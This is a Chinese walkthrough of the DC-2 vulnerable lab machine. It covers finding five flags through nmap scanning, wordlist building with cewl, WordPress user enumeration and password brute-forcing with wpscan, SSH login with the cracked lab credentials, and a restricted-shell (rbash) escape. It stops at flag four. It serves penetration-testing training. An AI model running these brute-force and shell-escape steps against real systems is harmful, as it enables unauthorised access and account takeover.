【靶机详解】DC-2
作者:互联网
环境搭建
- 下载靶机(DC-2 靶机下载)
- 解压后,使用 VMware 打开,并将攻击机和靶机的网卡,设置为 NAT 模式。
NAT 模式:将攻击机与靶机设置在同一网段下
环境信息
- 攻击机:kali -> IP:192.168.237.128
- 靶机:DC-2(Linux)
就像 DC-1 一样,有五个 flag,包括最终的 flag 。
请注意,您需要将渗透测试设备上的 hosts 文件设置为:
192.168.0.145 dc-2
显然,将 192.168.0.145 替换为 DC-2 的实际 IP 地址。
它将使生活变得更加简单(如果没有它,某些 CMS 可能无法工作)。
渗透思路
1信息收集
- 使用
nmap -sS -O 192.168.237.0/24
扫描网段,找寻靶机的 IP。
- 根据扫描出的系统信息,以及端口的开放情况,判断
192.168.237.162
是目标靶机的 IP,然后按照环境信息修改 hosts 文件。
Windows:C:\Windows\System32\drivers\etc\hosts
Linux:/etc/hosts
-
使用
nmap -A -T4 -p- 192.168.237.162
对靶机进行全面扫描。
-
发现靶机开放了 80 端口,并且靶机的 http 站点的 CMS 为 WordPress ,使用
http://192.168.237.162
尝试进行访问。
-
成功访问到靶机的 http 站点,根据首页内容,再次确认这是一个 WordPress 站点。
2漏洞发现
- 尝试点击首页的
Flag
选项,成功找到了第一个 flag。
您通常的单词表可能不起作用,因此,也许您只需要成为 cewl。
更多的密码总是更好,但有时你无法赢得所有密码。
以一个身份登录以查看下一个标志。
如果找不到,请以另一个身份登录。
- 根据 flag1 的内容,使用
cewl http://dc-2/ -w password.txt
制作密码字典。 - 因为 flag1 中提到需要登录,但是网页中找不到相关的登录界面入口,所以使用
dirsearch -u http://dc-2/
爆破网站目录,寻找登录界面。
-
成功找到登录界面,使用
http://dc-2/wp-login.php
进行访问。
-
访问成功后,由于目前只有密码字典,所以还需要使用
wpscan --url http://dc-2/ -e u
枚举 WordPress 站点中注册过的用户名,来制作用户名字典。
-
成功枚举出三个用户名,将这三个用户名写入到一个文件中,作为用户名字典。
-
使用
wpscan --url http://dc-2/ -U user.txt -P password.txt
调用相关的字典文件对网站进行爆破。
-
成功爆破出两个用户,尝试使用
jerry:adipiscing
进行登录。
-
登录成功后,把每个选项都点击一遍试试效果,在
Pages -> All Pages
下发现了 flag2。
如果您不能利用 WordPress 并走捷径,还有另一种方法。
希望你找到另一个切入点。
3漏洞利用
-
根据 flag2 中的内容,想到了在信息收集阶段中扫描出的 ssh 服务,并且当前我们知道两对用户名和密码,所以分别使用
ssh jerry/tom@192.168.237.162 -p 7744
尝试登录。
-
使用
tom:parturient
登录成功,使用whoami
查看当前权限。
-
发现当前为 rbash,被限制的 Shell,所以可以考虑进行 rbash 绕过。
-
使用
la -al
浏览一下当前目录,发现了flag3.txt
。
-
使用
cat flag3.txt
进行查看,发现无法使用该命令,所以尝试使用vim
或vi
进行查看。
可怜的老汤姆总是追着杰瑞跑。 也许他应该为他造成的所有压力感到不安。
- 使用
vi
查看成功,观察 flag3 中的内容,发现文本中包含Jerry
和su
,所以猜测需要使用su jerry
登录到 jerry 用户下,尝试后发现su
命令无法使用,所以下一步尝试进行 rbash 绕过。 - 使用
export -p
发现可以使用export
命令,所以使用以下命令进行 rbash 绕过:
BASH_CMDS[a]=/bin/sh;a #注:把 /bin/sh 给a变量并调用
export PATH=$PATH:/bin/ #注:将 /bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #注:将 /usr/bin 作为PATH环境变量导出
-
绕过成功,使用
su jerry
和之前爆破出的密码尝试进行登录。
-
登录成功,使用
cd /home/jerry/
访问家目录,发现了flag4.txt
。
很高兴看到你已经走到了这一步——但你还没有回家。
您仍然需要获得最终标志(唯一真正重要的标志!!!)。
这里没有任何提示——你现在就靠你自己了。标签:bin,http,登录,DC,192.168,详解,使用,靶机 来源: https://www.cnblogs.com/tkm-share/p/16600607.html